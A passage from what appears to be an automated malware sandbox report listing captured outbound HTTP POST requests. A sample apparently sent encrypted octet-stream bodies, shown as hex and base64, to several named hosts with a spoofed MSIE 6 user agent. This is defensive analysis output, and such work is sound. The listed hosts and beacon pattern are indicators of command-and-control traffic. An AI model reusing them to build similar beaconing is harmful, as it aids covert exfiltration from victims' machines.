68 50 31 58 75 55 73 31 71 61 45 33 56 6d 68 58 70 51 6b 4e 58 2b 67 39 4e 4d 4b 42 4e 30 61 4f 42 47 74 65 4c 47 67 4e 48 5a 49 6c 75 70 6f 64 73 61 6f 32 49 7a 41 62 77 56 72 51 3d 3d Data Ascii: MbBd0a9qC5Qix3l7zhicuLh4eCzFjIN7Uw1rZh2o0jHota9A1IvqNA+Y8evX1Rr33aMI4lPi6WmtcDPgJJOTJzoUZ9fM5BCCWGEOML5jpf6pzL4A6+YlpUhsRATVqS3ixZIlxRLgMmkCZzZF1BukZlnIOOt9WzsCCyuq40TaBGK25DTaC7rhPqaSSTE9nQ5XNDEICUJ5Dxe3E7GBA74fI7o0x8Z72FspiS/S3KgAXcoY/Fst/yxJDBX/xg99fapAB2xPa/xwl9FBPs8rndk/uh/gNaav+Ju5mu5i8tUsXa9M9yeDTCSTcOvCnPjtQP+wIjj9Uu3cVUsmsmzo2eVA0zYlBXdS2KkQfddLqk3dBso+FyfIjyusmhvcbKGSMejVac6uOYeG52/cVqVKfdrza5fBdVTkIs2qiIU+gvPth/90QMUf0KdpeI9ol0qD0nrW6B9rW16eIVYbzZ6LHh9T7EVHLetccWP44WzCqZgjHOu0iahP1XuUs1qaE3VmhXpQkNX+g9NMKBN0aOBGteLGgNHZIlupodsao2IzAbwVrQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 31 7a 64 30 64 68 2f 48 45 4a 51 76 73 34 53 44 66 6d 6d 6d 34 71 6a 43 75 6d 58 31 65 53 2b 67 77 37 44 4f 34 4f 2b 59 66 30 76 6e 35 49 31 64 67 34 33 6c 32 5a 35 7a 41 71 30 4e 4c 47 71 68 6e 46 54 70 70 34 5a 56 75 70 4e 66 46 74 47 62 30 39 72 32 62 43 6c 4d 41 67 6c 4b 69 42 6a 66 54 52 78 73 5a 6a 30 4c 55 49 79 46 47 4d 6e 69 5a 65 78 43 56 67 4d 78 34 52 73 41 6a 32 44 69 6f 59 38 6e 55 45 70 54 66 70 44 59 63 39 6d 46 47 47 42 6f 56 68 74 31 6f 71 76 76 61 74 36 64 4c 31 42 57 4a 4b 65 48 61 53 79 38 43 51 67 47 68 62 63 30 6b 43 4a 33 54 34 73 76 7a 6b 38 72 72 4f 61 4f 69 37 36 62 50 4a 57 41 7a 61 6d 64 66 4c 45 77 44 57 4e 2f 2f 66 70 4e 38 47 70 66 6a 42 2f 56 67 43 6d 76 4a 50 5a 49 37 6e 6e 66 47 79 2f 46 6f 31 5a 64 79 35 68 58 6b 58 37 49 71 43 41 44 42 67 70 61 4d 6e 74 41 67 75 6d 6b 53 65 4e 4a 72 38 4f 6b 6e 46 6a 33 70 69 65 4f 4e 77 66 36 38 35 69 6b 62 43 64 75 70 67 32 6a 6f 46 6e 30 47 72 2f 4f 36 49 43 7a 36 38 4e 78 68 4b 74 7a 39 67 55 73 32 76 4a 47 78 6c 31 36 43 61 79 64 38 2f 64 7a 67 51 36 7a 30 75 36 2b 67 74 42 72 44 72 5a 2f 78 73 6c 65 61 34 71 4a 52 64 67 59 34 73 66 76 76 33 59 73 38 79 68 64 36 78 35 32 71 59 49 6a 62 71 72 35 79 45 34 32 53 6e 4a 70 73 66 49 62 5a 79 7a 31 67 52 53 51 4e 52 36 57 73 38 56 71 33 5a 63 38 70 36 79 39 73 50 30 5a 6d 41 6b 71 47 31 75 55 75 54 39 56 35 76 47 35 34 56 4c 35 30 66 4a 66 75 78 66 2b 6e 6e 7a 45 74 6a 76 6a 65 66 48 42 52 41 6d 6a 38 6a 4c 4b 4d 4c 74 61 47 41 4a 6d 45 58 46 55 38 6f 73 34 49 6e 36 6f 6a 43 30 52 59 75 4b 5a 57 4c 36 4d 74 5a 30 5a 79 73 49 4f 57 53 51 52 35 6e 63 36 6a 48 4e 57 4f 32 49 64 46 63 4c 67 69 37 58 61 45 59 7a 63 45 41 36 7a 41 65 4b 76 71 37 6a 6a 4b 58 6b 59 67 78 6f 4a 4f 44 64 35 45 4a 48 79 50 52 34 3d Data Ascii: 1zd0dh/HEJQvs4SDfmmm4qjCumX1eS+gw7DO4O+Yf0vn5I1dg43l2Z5zAq0NLGqhnFTpp4ZVupNfFtGb09r2bClMAglKiBjfTRxsZj0LUIyFGMniZexCVgMx4RsAj2DioY8nUEpTfpDYc9mFGGBoVht1oqvvat6dL1BWJKeHaSy8CQgGhbc0kCJ3T4svzk8rrOaOi76bPJWAzamdfLEwDWN//fpN8GpfjB/VgCmvJPZI7nnfGy/Fo1Zdy5hXkX7IqCADBgpaMntAgumkSeNJr8OknFj3pieONwf685ikbCdupg2joFn0Gr/O6ICz68NxhKtz9gUs2vJGxl16Cayd8/dzgQ6z0u6+gtBrDrZ/xslea4qJRdgY4sfvv3Ys8yhd6x52qYIjbqr5yE42SnJpsfIbZyz1gRSQNR6Ws8Vq3Zc8p6y9sP0ZmAkqG1uUuT9V5vG54VL50fJfuxf+nnzEtjvjefHBRAmj8jLKMLtaGAJmEXFU8os4In6ojC0RYuKZWL6MtZ0ZysIOWSQR5nc6jHNWO2IdFcLgi7XaEYzcEA6zAeKvq7jjKXkYgxoJODd5EJHyPR4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 36 7a 58 6e 64 74 72 4b 45 4a 54 6f 6e 35 66 41 2f 52 78 6d 51 52 31 70 2f 41 54 4b 34 36 6d 46 72 6b 71 51 4f 6d 50 67 57 48 53 36 65 2f 66 52 4b 6c 56 41 38 64 2b 35 35 5a 63 65 63 5a 69 52 31 4d 63 4e 72 51 4c 48 4f 75 6f 30 6e 77 41 2f 45 63 4b 54 46 4c 35 44 6a 30 7a 32 4d 46 71 47 4d 74 6d 4c 45 54 54 71 4f 65 74 34 52 32 67 71 47 48 66 49 70 7a 2b 6f 68 61 36 53 4a 53 4f 69 52 72 36 65 6f 79 6d 54 5a 47 70 71 35 39 39 45 75 33 56 65 2f 4d 63 5a 56 6f 30 76 6f 66 42 57 54 77 4c 53 70 61 65 42 47 61 7a 71 56 4b 45 4d 6a 57 47 35 68 78 63 31 34 76 68 43 47 62 79 77 55 41 74 43 34 48 52 4f 77 49 4b 4c 67 7a 5a 6d 4a 65 50 55 42 71 64 76 68 55 66 52 46 78 51 66 53 6a 39 6c 47 70 4c 48 43 4e 34 4b 4d 51 7a 52 47 4d 38 38 51 66 77 62 58 7a 55 71 32 6c 62 39 61 36 4f 34 43 31 4d 2b 62 52 30 39 4a 62 6d 65 6d 2f 64 55 30 36 43 37 74 38 6c 32 59 6f 66 44 4a 6c 31 35 4e 34 59 4e 47 31 7a 50 39 6c 52 30 78 58 46 78 50 58 47 54 74 6a 51 49 65 75 36 56 48 2b 4f 4c 56 6b 70 62 33 42 68 65 30 53 32 6f 75 6e 71 52 4d 42 2b 33 63 4d 45 79 66 36 71 78 4b 30 41 6e 53 33 41 52 30 44 2f 32 2f 76 6f 63 43 72 30 45 72 63 68 51 4c 32 33 58 51 45 64 36 67 63 6b 52 77 6c 4b 55 66 6d 57 41 53 63 42 4c 55 45 5a 6f 31 46 31 44 54 4f 65 4a 2f 44 79 53 37 39 55 75 46 50 72 4f 74 72 59 44 58 4e 5a 72 64 4d 79 45 72 61 4c 66 44 68 46 52 32 6c 77 44 6a 6b 79 33 48 77 6e 7a 4c 69 59 42 48 6e 59 38 47 51 4d 33 69 4f 53 4d 72 64 56 4e 5a 4b 64 61 65 44 69 69 4c 75 44 49 69 50 6b 32 32 55 59 49 69 52 54 61 75 58 73 43 69 79 4f 32 30 71 6c 70 74 30 36 4a 44 73 39 6d 59 49 41 71 50 6d 4b 52 45 65 52 62 74 58 6d 76 73 32 55 56 Data Ascii: 6zXndtrKEJTon5fA/RxmQR1p/ATK46mFrkqQOmPgWHS6e/fRKlVA8d+55ZcecZiR1McNrQLHOuo0nwA/EcKTFL5Dj0z2MFqGMtmLETTqOet4R2gqGHfIpz+oha6SJSOiRr6eoymTZGpq599Eu3Ve/McZVo0vofBWTwLSpaeBGazqVKEMjWG5hxc14vhCGbywUAtC4HROwIKLgzZmJePUBqdvhUfRFxQfSj9lGpLHCN4KMQzRGM88QfwbXzUq2lb9a6O4C1M+bR09Jbmem/dU06C7t8l2YofDJl15N4YNG1zP9lR0xXFxPXGTtjQIeu6VH+OLVkpb3Bhe0S2ounqRMB+3cMEyf6qxK0AnS3AR0D/2/vocCr0ErchQL23XQEd6gckRwlKUfmWAScBLUEZo1F1DTOeJ/DyS79UuFPrOtrYDXNZrdMyEraLfDhFR2lwDjky3HwnzLiYBHnY8GQM3iOSMrdVNZKdaeDiiLuDIiPk22UYIiRTauXsCiyO20qlpt06JDs9mYIAqPmKREeRbtXmvs2UV
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 58 75 56 32 71 37 66 74 65 73 77 46 57 67 59 63 4a 75 39 43 30 41 44 5a 37 4f 4a 74 45 4e 47 45 32 37 79 5a 4d 38 77 75 4c 41 46 36 2b 71 6e 57 36 32 6e 5a 6f 46 71 78 78 56 64 41 6b 64 42 63 75 6a 42 4e 70 57 71 65 38 75 41 62 47 54 43 42 64 31 2f 35 62 34 79 6e 71 78 34 50 4f 45 4d 58 41 6a 44 33 63 64 6c 35 57 76 65 30 59 51 51 44 37 4f 6a 77 5a 70 74 38 6a 56 51 70 33 51 69 70 79 7a 34 44 67 4a 31 6f 76 53 47 41 41 63 57 79 2b 6f 64 2f 48 2f 74 32 52 4a 39 79 6e 71 69 58 58 37 78 6b 79 65 47 73 6c 6d 30 48 2f 56 43 75 78 51 63 6c 30 77 77 6c 62 64 70 73 73 5a 52 46 49 71 46 64 6e 33 33 46 4d 30 68 2b 6f 57 33 33 77 43 42 58 59 46 66 64 34 49 63 54 36 4b 6f 5a 77 6e 79 6f 72 61 4d 72 45 5a 59 6a 59 6c 65 2b 51 49 33 54 7a 62 77 66 47 79 66 32 79 76 70 4d 37 4b 31 53 31 43 4b 36 6e 56 30 77 5a 66 4c 42 7a 42 64 37 32 50 79 56 4b 2f 53 41 68 31 59 73 73 46 48 62 53 41 74 72 30 4b 68 4a 4a 49 37 4c 77 4d 2b 45 53 6b 39 4b 52 5a 77 4e 47 66 75 36 44 4a 2f 66 66 4e 4b 47 78 4a 39 32 42 57 43 33 57 65 42 74 46 75 63 68 47 69 71 7a 57 67 57 53 73 64 6b 75 53 6f 66 38 47 61 35 69 36 6c 39 32 67 4b 52 48 71 6d 6c 61 50 74 78 45 74 50 4c 42 35 63 79 67 6f 51 58 71 43 39 34 70 42 6e 61 50 4d 4f 77 4c 44 6d 32 42 68 6c 57 6d 52 52 55 5a 78 41 53 30 2b 4c 76 50 47 45 41 66 33 50 52 49 2f 52 37 51 79 48 44 43 4f 66 43 71 58 4d 37 51 48 74 39 6b 37 30 4b 31 42 45 75 67 38 42 49 44 51 48 43 5a 79 67 54 38 51 79 70 49 5a 75 70 65 72 48 63 6f 73 74 65 2b 53 66 31 75 5a 44 74 30 54 2f 4a 39 70 61 69 4a 42 46 6a 53 53 44 2f 41 5a 76 37 4a 77 2f 59 65 5a 39 70 36 63 39 4c 41 6b 78 4c 7a 69 77 58 33 4d 4f 61 58 6d 49 37 2b 7a 63 38 6f 4c 63 6b 71 39 4a 4b 79 6f 6a 31 39 45 67 3d 3d Data Ascii: XuV2q7fteswFWgYcJu9C0ADZ7OJtENGE27yZM8wuLAF6+qnW62nZoFqxxVdAkdBcujBNpWqe8uAbGTCBd1/5b4ynqx4POEMXAjD3cdl5Wve0YQQD7OjwZpt8jVQp3Qipyz4DgJ1ovSGAAcWy+od/H/t2RJ9ynqiXX7xkyeGslm0H/VCuxQcl0wwlbdpssZRFIqFdn33FM0h+oW33wCBXYFfd4IcT6KoZwnyoraMrEZYjYle+QI3TzbwfGyf2yvpM7K1S1CK6nV0wZfLBzBd72PyVK/SAh1YssFHbSAtr0KhJJI7LwM+ESk9KRZwNGfu6DJ/ffNKGxJ92BWC3WeBtFuchGiqzWgWSsdkuSof8Ga5i6l92gKRHqmlaPtxEtPLB5cygoQXqC94pBnaPMOwLDm2BhlWmRRUZxAS0+LvPGEAf3PRI/R7QyHDCOfCqXM7QHt9k70K1BEug8BIDQHCZygT8QypIZuperHcoste+Sf1uZDt0T/J9paiJBFjSSD/AZv7Jw/YeZ9p6c9LAkxLziwX3MOaXmI7+zc8oLckq9JKyoj19Eg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 31 7a 64 30 64 68 2f 48 45 4a 51 76 73 34 53 44 66 6d 6d 6d 34 71 6a 43 75 6d 58 31 65 53 2b 67 77 37 44 4f 34 4f 2b 59 66 30 76 6e 35 49 31 64 67 34 33 6c 32 5a 35 7a 41 71 30 4e 4c 47 71 68 6e 46 54 70 70 34 5a 56 75 70 4e 66 46 74 47 62 30 39 72 32 62 43 6c 4d 41 67 6c 4b 69 42 6a 66 54 52 78 73 5a 6a 30 4c 55 49 79 46 47 4d 6e 69 5a 65 78 43 56 67 4d 78 34 52 73 41 6a 32 44 69 6f 59 38 6e 55 45 70 54 66 70 44 59 63 39 6d 46 47 47 42 6f 56 68 74 31 6f 71 76 76 61 74 36 64 4c 31 42 57 4a 4b 65 48 61 53 79 38 43 51 67 47 68 62 63 30 6b 43 4a 33 54 34 73 76 7a 6b 38 72 72 4f 61 4f 69 37 36 62 50 4a 57 41 7a 61 6d 64 66 4c 45 77 44 57 4e 2f 2f 66 70 4e 38 47 70 66 6a 42 2f 56 67 43 6d 76 4a 50 5a 49 37 6e 6e 66 47 79 2f 46 6f 31 5a 64 79 35 68 58 6b 58 37 49 71 43 41 44 42 67 70 61 4d 6e 74 41 67 75 6d 6b 53 65 4e 4a 72 38 4f 6b 6e 46 6a 33 70 69 65 4f 4e 77 66 36 38 35 69 6b 62 43 64 75 70 67 32 6a 6f 46 6e 30 47 72 2f 4f 36 49 43 7a 36 38 4e 78 68 4b 74 7a 39 67 55 73 32 76 4a 47 78 6c 31 36 43 61 79 64 38 2f 64 7a 67 51 36 7a 30 75 36 2b 67 74 42 72 44 72 5a 2f 78 73 6c 65 61 34 71 4a 52 64 67 59 34 73 66 76 76 33 59 73 38 79 68 64 36 78 35 32 71 59 49 6a 62 71 72 35 79 45 34 32 53 6e 4a 70 73 66 49 62 5a 79 7a 31 67 52 53 51 4e 52 36 57 73 38 56 71 33 5a 63 38 70 36 79 39 73 50 30 5a 6d 41 6b 71 47 31 75 55 75 54 39 56 35 76 47 35 34 56 4c 35 30 66 4a 66 75 78 66 2b 6e 6e 7a 45 74 6a 76 6a 65 66 48 42 52 41 6d 6a 38 6a 4c 4b 4d 4c 74 61 47 41 4a 6d 45 58 46 55 38 6f 73 34 49 6e 36 6f 6a 43 30 52 59 75 4b 5a 57 4c 36 4d 74 5a 30 5a 79 73 49 4f 57 53 51 52 35 6e 63 36 6a 48 4e 57 4f 32 49 64 46 63 4c 67 69 37 58 61 45 59 7a 63 45 41 36 7a 41 65 4b 76 71 37 6a 6a 4b 58 6b 59 67 78 6f 4a 4f 44 64 35 45 4a 48 79 50 52 34 3d Data Ascii: 1zd0dh/HEJQvs4SDfmmm4qjCumX1eS+gw7DO4O+Yf0vn5I1dg43l2Z5zAq0NLGqhnFTpp4ZVupNfFtGb09r2bClMAglKiBjfTRxsZj0LUIyFGMniZexCVgMx4RsAj2DioY8nUEpTfpDYc9mFGGBoVht1oqvvat6dL1BWJKeHaSy8CQgGhbc0kCJ3T4svzk8rrOaOi76bPJWAzamdfLEwDWN//fpN8GpfjB/VgCmvJPZI7nnfGy/Fo1Zdy5hXkX7IqCADBgpaMntAgumkSeNJr8OknFj3pieONwf685ikbCdupg2joFn0Gr/O6ICz68NxhKtz9gUs2vJGxl16Cayd8/dzgQ6z0u6+gtBrDrZ/xslea4qJRdgY4sfvv3Ys8yhd6x52qYIjbqr5yE42SnJpsfIbZyz1gRSQNR6Ws8Vq3Zc8p6y9sP0ZmAkqG1uUuT9V5vG54VL50fJfuxf+nnzEtjvjefHBRAmj8jLKMLtaGAJmEXFU8os4In6ojC0RYuKZWL6MtZ0ZysIOWSQR5nc6jHNWO2IdFcLgi7XaEYzcEA6zAeKvq7jjKXkYgxoJODd5EJHyPR4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 4d 62 42 64 30 61 39 71 43 35 51 69 78 33 6c 37 7a 68 69 63 75 4c 68 34 65 43 7a 46 6a 49 4e 37 55 77 31 72 5a 68 32 6f 30 6a 48 6f 74 61 39 41 31 49 76 71 4e 41 2b 59 38 65 76 58 31 52 72 33 33 61 4d 49 34 6c 50 69 36 57 6d 74 63 44 50 67 4a 4a 4f 54 4a 7a 6f 55 5a 39 66 4d 35 42 43 43 57 47 45 4f 4d 4c 35 6a 70 66 36 70 7a 4c 34 41 36 2b 59 6c 70 55 68 73 52 41 54 56 71 53 33 69 78 5a 49 6c 78 52 4c 67 4d 6d 6b 43 5a 7a 5a 46 31 42 75 6b 5a 6c 6e 49 4f 4f 74 39 57 7a 73 43 43 79 75 71 34 30 54 61 42 47 4b 32 35 44 54 61 43 37 72 68 50 71 61 53 53 54 45 39 6e 51 35 58 4e 44 45 49 43 55 4a 35 44 78 65 33 45 37 47 42 41 37 34 66 49 37 6f 30 78 38 5a 37 32 46 73 70 69 53 2f 53 33 4b 67 41 58 63 6f 59 2f 46 73 74 2f 79 78 4a 44 42 58 2f 78 67 39 39 66 61 70 41 42 32 78 50 61 2f 78 77 6c 39 46 42 50 73 38 72 6e 64 6b 2f 75 68 2f 67 4e 61 61 76 2b 4a 75 35 6d 75 35 69 38 74 55 73 58 61 39 4d 39 79 65 44 54 43 53 54 63 4f 76 43 6e 50 6a 74 51 50 2b 77 49 6a 6a 39 55 75 33 63 56 55 73 6d 73 6d 7a 6f 32 65 56 41 30 7a 59 6c 42 58 64 53 32 4b 6b 51 66 64 64 4c 71 6b 33 64 42 73 6f 2b 46 79 66 49 6a 79 75 73 6d 68 76 63 62 4b 47 53 4d 65 6a 56 61 63 36 75 4f 59 65 47 35 32 2f 63 56 71 56 4b 66 64 72 7a 61 35 66 42 64 56 54 6b 49 73 32 71 69 49 55 2b 67 76 50 74 68 2f 39 30 51 4d 55 66 30 4b 64 70 65 49 39 6f 6c 30 71 44 30 6e 72 57 36 42 39 72 57 31 36 65 49 56 59 62 7a 5a 36 4c 48 68 39 54 37 45 56 48 4c 65 74 63 63 57 50 34 34 57 7a 43 71 5a 67 6a 48 4f 75 30 69 61 68 50 31 58 75 55 73 31 71 61 45 33 56 6d 68 58 70 51 6b 4e 58 2b 67 39 4e 4d 4b 42 4e 30 61 4f 42 47 74 65 4c 47 67 4e 48 5a 49 6c 75 70 6f 64 73 61 6f 32 49 7a 41 62 77 56 72 51 3d 3d Data Ascii: MbBd0a9qC5Qix3l7zhicuLh4eCzFjIN7Uw1rZh2o0jHota9A1IvqNA+Y8evX1Rr33aMI4lPi6WmtcDPgJJOTJzoUZ9fM5BCCWGEOML5jpf6pzL4A6+YlpUhsRATVqS3ixZIlxRLgMmkCZzZF1BukZlnIOOt9WzsCCyuq40TaBGK25DTaC7rhPqaSSTE9nQ5XNDEICUJ5Dxe3E7GBA74fI7o0x8Z72FspiS/S3KgAXcoY/Fst/yxJDBX/xg99fapAB2xPa/xwl9FBPs8rndk/uh/gNaav+Ju5mu5i8tUsXa9M9yeDTCSTcOvCnPjtQP+wIjj9Uu3cVUsmsmzo2eVA0zYlBXdS2KkQfddLqk3dBso+FyfIjyusmhvcbKGSMejVac6uOYeG52/cVqVKfdrza5fBdVTkIs2qiIU+gvPth/90QMUf0KdpeI9ol0qD0nrW6B9rW16eIVYbzZ6LHh9T7EVHLetccWP44WzCqZgjHOu0iahP1XuUs1qaE3VmhXpQkNX+g9NMKBN0aOBGteLGgNHZIlupodsao2IzAbwVrQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 6e 2f 2b 71 42 65 2b 39 48 5a 54 38 67 73 41 79 44 74 4c 31 4a 2f 68 74 66 4d 51 46 73 61 36 36 6b 7a 51 72 6b 77 45 72 63 69 51 4d 2b 72 68 77 32 4c 44 55 75 58 64 76 6a 62 6e 49 53 4d 4f 54 53 37 69 72 4b 62 62 37 77 4a 72 7a 76 66 36 51 58 4e 6b 32 6e 68 66 5a 62 4e 65 4f 42 69 75 4a 37 34 35 49 4b 74 2b 35 6b 41 37 36 2b 44 73 62 52 62 41 38 35 68 68 70 36 6c 67 36 51 70 77 65 62 37 7a 4d 6f 64 79 58 4c 49 56 38 62 37 76 51 52 35 4d 61 66 62 7a 63 74 35 30 66 4b 70 51 53 43 4c 52 41 7a 31 50 34 4d 57 38 53 69 4d 4d 2b 72 54 54 51 4d 73 4b 36 6f 66 39 73 78 48 46 6b 5a 67 74 6b 4c 72 33 30 46 71 37 65 61 61 6f 7a 4e 74 48 63 74 38 6d 58 69 37 48 36 45 55 62 67 31 59 64 50 43 50 34 73 58 5a 71 49 48 4e 50 75 62 57 5a 32 48 4d 69 33 74 36 43 68 43 39 72 37 44 75 56 79 6a 42 6d 45 6f 61 58 67 33 58 41 64 57 30 68 6c 6f 32 78 78 4c 31 4c 67 6a 72 39 30 62 76 6b 6a 39 72 67 4e 56 74 52 49 6a 47 53 31 4b 52 36 4d 58 4b 45 68 47 5a 6e 46 51 30 45 33 46 48 6d 57 7a 42 76 6f 63 78 5a 54 72 2b 41 34 39 61 35 69 31 71 47 69 55 6a 67 6f 38 43 37 64 56 44 49 41 42 31 32 34 37 7a 6b 30 67 43 68 34 33 56 46 76 46 31 66 4d 45 37 57 6d 72 6e 64 54 38 64 35 72 47 32 4f 6c 53 6d 42 32 72 46 70 71 49 49 75 68 73 72 76 4e 66 46 7a 63 6f 5a 4d 62 58 54 75 39 35 33 2b 53 50 43 55 50 43 78 66 69 48 51 4d 77 72 48 2f 4e 67 55 32 73 61 51 47 37 61 49 6b 59 65 72 41 70 79 63 63 55 2f 4b 79 71 55 57 45 44 62 62 31 52 78 42 38 61 44 2f 46 46 71 52 57 57 45 71 76 34 46 73 33 76 58 41 45 5a 4e 4a 43 39 75 79 6c 35 51 62 78 31 49 73 65 5a 69 65 36 46 54 31 70 4e 50 43 74 31 45 4d 65 38 2f 2f 55 70 73 4d 6c 6d 4f 67 54 41 4b 78 73 36 4f 76 69 33 Data Ascii: n/+qBe+9HZT8gsAyDtL1J/htfMQFsa66kzQrkwErciQM+rhw2LDUuXdvjbnISMOTS7irKbb7wJrzvf6QXNk2nhfZbNeOBiuJ745IKt+5kA76+DsbRbA85hhp6lg6Qpweb7zModyXLIV8b7vQR5Mafbzct50fKpQSCLRAz1P4MW8SiMM+rTTQMsK6of9sxHFkZgtkLr30Fq7eaaozNtHct8mXi7H6EUbg1YdPCP4sXZqIHNPubWZ2HMi3t6ChC9r7DuVyjBmEoaXg3XAdW0hlo2xxL1Lgjr90bvkj9rgNVtRIjGS1KR6MXKEhGZnFQ0E3FHmWzBvocxZTr+A49a5i1qGiUjgo8C7dVDIAB1247zk0gCh43VFvF1fME7WmrndT8d5rG2OlSmB2rFpqIIuhsrvNfFzcoZMbXTu953+SPCUPCxfiHQMwrH/NgU2saQG7aIkYerApyccU/KyqUWEDbb1RxB8aD/FFqRWWEqv4Fs3vXAEZNJC9uyl5Qbx1IseZie6FT1pNPCt1EMe8//UpsMlmOgTAKxs6Ovi3
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 77 57 55 30 42 52 53 36 48 5a 53 45 64 6d 67 2f 37 31 34 4a 78 6d 63 79 4c 7a 36 4d 5a 42 50 73 69 47 41 72 43 72 6a 39 6e 32 39 49 46 42 47 38 73 32 4a 42 62 50 68 33 6b 45 70 33 64 6e 67 37 67 2f 62 45 54 50 73 33 45 54 76 44 42 35 64 54 70 56 6e 58 78 52 41 4e 49 53 6f 39 31 76 61 31 31 65 64 55 66 34 76 6a 64 6d 5a 62 75 49 53 62 6f 4b 77 66 6f 76 43 56 54 66 2b 78 6a 63 5a 64 77 37 33 64 62 77 34 57 33 61 43 57 71 4b 6a 46 4e 38 59 63 44 63 4b 6a 42 55 5a 63 71 76 32 4d 61 47 38 79 4c 58 75 4e 55 4e 6c 57 57 69 33 48 48 70 72 6f 34 30 53 51 74 68 67 53 72 37 59 55 38 6d 66 53 30 7a 51 6b 62 6f 55 57 69 4e 4d 36 45 71 72 4f 79 75 36 77 4c 74 76 68 55 48 4b 46 58 57 57 46 55 67 2f 71 6e 31 44 6f 33 4a 6e 47 44 56 4e 53 59 54 76 58 52 68 57 72 46 65 56 67 2f 48 38 31 6d 2b 61 37 4f 53 4c 48 37 42 61 77 56 66 4f 67 6c 38 64 34 74 55 59 77 58 39 43 6a 75 47 42 76 55 48 71 54 42 61 46 4d 48 53 4c 56 74 58 30 34 63 2f 4b 44 31 39 6f 41 57 62 79 78 35 4b 69 54 77 51 76 38 59 53 6b 48 4a 77 53 37 68 4f 64 42 66 43 7a 6f 2f 39 5a 64 31 56 44 35 52 52 50 2b 62 54 59 79 66 6e 56 70 4b 56 4a 38 63 38 54 50 75 48 50 6a 63 6e 61 2b 6e 58 6b 57 32 36 65 32 4b 52 56 73 46 6a 2b 33 34 67 6f 53 30 66 4d 38 43 36 57 43 4e 71 4b 6b 2f 5a 4a 70 34 58 69 67 57 68 63 63 6e 46 37 62 7a 6a 77 36 54 63 75 51 39 63 4f 5a 56 78 6a 4d 47 49 4b 73 4c 47 2f 41 49 2f 63 44 65 53 30 62 65 62 46 63 42 36 78 55 41 36 4a 7a 4d 47 49 37 41 70 36 68 4d 53 37 4e 58 45 34 4c 31 56 56 72 68 70 78 62 2f 30 4c 56 4c 77 58 48 69 35 43 7a 43 57 6a 42 70 31 45 6d 48 67 52 6b 45 63 64 5a 41 49 38 33 6e 56 48 64 51 62 7a 58 36 45 6a 71 75 4b 73 62 73 72 35 36 Data Ascii: wWU0BRS6HZSEdmg/714JxmcyLz6MZBPsiGArCrj9n29IFBG8s2JBbPh3kEp3dng7g/bETPs3ETvDB5dTpVnXxRANISo91va11edUf4vjdmZbuISboKwfovCVTf+xjcZdw73dbw4W3aCWqKjFN8YcDcKjBUZcqv2MaG8yLXuNUNlWWi3HHpro40SQthgSr7YU8mfS0zQkboUWiNM6EqrOyu6wLtvhUHKFXWWFUg/qn1Do3JnGDVNSYTvXRhWrFeVg/H81m+a7OSLH7BawVfOgl8d4tUYwX9CjuGBvUHqTBaFMHSLVtX04c/KD19oAWbyx5KiTwQv8YSkHJwS7hOdBfCzo/9Zd1VD5RRP+bTYyfnVpKVJ8c8TPuHPjcna+nXkW26e2KRVsFj+34goS0fM8C6WCNqKk/ZJp4XigWhccnF7bzjw6TcuQ9cOZVxjMGIKsLG/AI/cDeS0bebFcB6xUA6JzMGI7Ap6hMS7NXE4L1VVrhpxb/0LVLwXHi5CzCWjBp1EmHgRkEcdZAI83nVHdQbzX6EjquKsbsr56
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 4f 7a 35 4e 41 30 53 71 48 5a 51 30 37 66 38 4d 58 37 42 72 4e 42 63 43 39 68 4a 38 30 42 73 35 75 4c 75 4f 4d 70 79 47 30 42 2f 4b 78 49 6b 78 34 51 52 73 33 6d 4d 6b 6f 6e 4a 2b 4a 32 71 51 74 58 71 4c 6f 62 4c 6c 31 6b 34 72 6e 72 39 31 68 35 72 6a 36 76 72 68 55 44 75 45 44 70 77 52 31 65 32 70 31 62 6e 78 4c 4e 61 68 37 73 72 49 4e 4f 37 4c 6f 35 69 4f 71 54 77 50 31 30 55 4d 47 30 70 37 32 51 70 74 4a 61 65 73 6d 4b 56 48 6a 69 4d 53 38 63 31 66 67 68 42 37 48 43 69 4e 6b 41 6e 36 38 30 57 43 75 39 52 34 50 38 75 39 2b 35 66 42 6a 52 4c 4d 2b 65 77 33 6a 31 6f 70 63 4a 52 56 6d 31 68 55 4f 72 6e 50 73 34 38 4c 74 58 33 56 56 6d 69 50 6f 38 38 35 6a 52 31 78 6f 47 37 69 58 46 56 6c 7a 4c 44 74 37 44 35 34 7a 70 59 58 59 73 65 45 6b 70 51 63 58 42 50 39 39 70 48 75 43 35 5a 6a 65 7a 36 30 6c 6b 